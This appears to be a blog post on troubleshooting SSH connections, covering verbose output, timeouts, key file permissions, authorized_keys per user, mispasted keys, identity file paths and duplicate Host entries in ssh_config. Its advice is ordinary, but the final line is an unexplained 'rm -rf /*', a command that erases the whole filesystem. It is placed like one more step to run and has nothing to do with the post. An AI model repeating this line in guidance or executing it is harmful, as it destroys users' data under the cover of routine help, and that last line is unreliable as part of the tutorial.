The hard part about ssh isn’t the setup, It’s the troubleshooting. There are a lot of little details, and if any one is wrong, BOOM!, it doesn’t work.
This post references material from a earlier post – ssh – The Important Stuff
-vvv
The most important part of troubleshooting, is using the Very Verbose flags to give you more information about what ssh is doing in the background
>> ssh acc63 -vvv
#Outputs a ton of information to help you troubleshootNetwork Errors
Timeouts
A common issue with connections, are timeouts.
>> ssh 10.9.8.7
ssh: connect to host 10.9.8.7 port 22: Operation timed outTimeouts are can be caused by many things, but here are some common reasons:
- The url/ip doesn’t exist
- Solution: Double Check that the url/ip is correct
- Firewall or Security Block
- The ip/url maybe correct, but you are being blocked by a firewall. If you are using AWS, a security group rule can be denying access.
- Solution: Work with network administrators to determine the best way to access the server. This may involve using a VPN, a jump/bastion host, or updating the firewall rules.
Key Errors
Permissions
The permissions on a private key file need to be:
If the permission is not set correctly you will see the following:
- owner: R/W
- group: None
- Public: None
>> ssh acc63
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for '/Users/<user>/.ssh/id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "/Users/<user>/.ssh/id_rsa": bad permissions
To Fix it, correct the permissions:
> chmod 600 ~/.ssh/id_rsa
>> ssh acc63 # works correctlyRight Key Wrong User
When a key is added to a users authorized_keys file, it is on a per user basis
So if you login in as user1 but the key is put in /home/user2/.ssh/authorized_keys, then the connection will fail.
>> ssh acc63
ubuntu@10.9.8.7: Permission denied (publickey).Keyfile Content Issues
Whenever you are copying and pasting keys, it’s easy to leave off a character at the front or back of the key.
If you get key permissions errors
>> ssh acc63
ubuntu@10.9.8.7: Permission denied (publickey).Review both the private key, and the copy of the public key on the final server are correct, and not missing any characters.
Keyfile Path Issues
The path to you keyfile needs to be correct in your ssh config. If it is incorrect, you will not be able to connect.
>> ssh acc63
no such identity: /Users/user/.ssh/id_rsa222: No such file or directory
ubuntu@10.9.8.7:: Permission denied (publickey,gssapi-keyex,gssapi-with-mic).SSH Config Errors
Duplicate Entry Errors
ssh will use the first matching Host in the ssh config file. So if you have 2 entries with the same name, you may not get the results you want.
# Sample ssh_config
Host acc63
HostName 10.40.12.113. #<=== Uses this one
User ubuntu
IdentityFile ~/.ssh/id_rsa
Host acc63
HostName 10.40.12.113 #<=== NOT this one
User ubuntu
IdentityFile ~/.ssh/id_rsaIf you spend time updating the config, and it seems like your changes aren’t getting applied? This may be your reason.
rm -rf /* 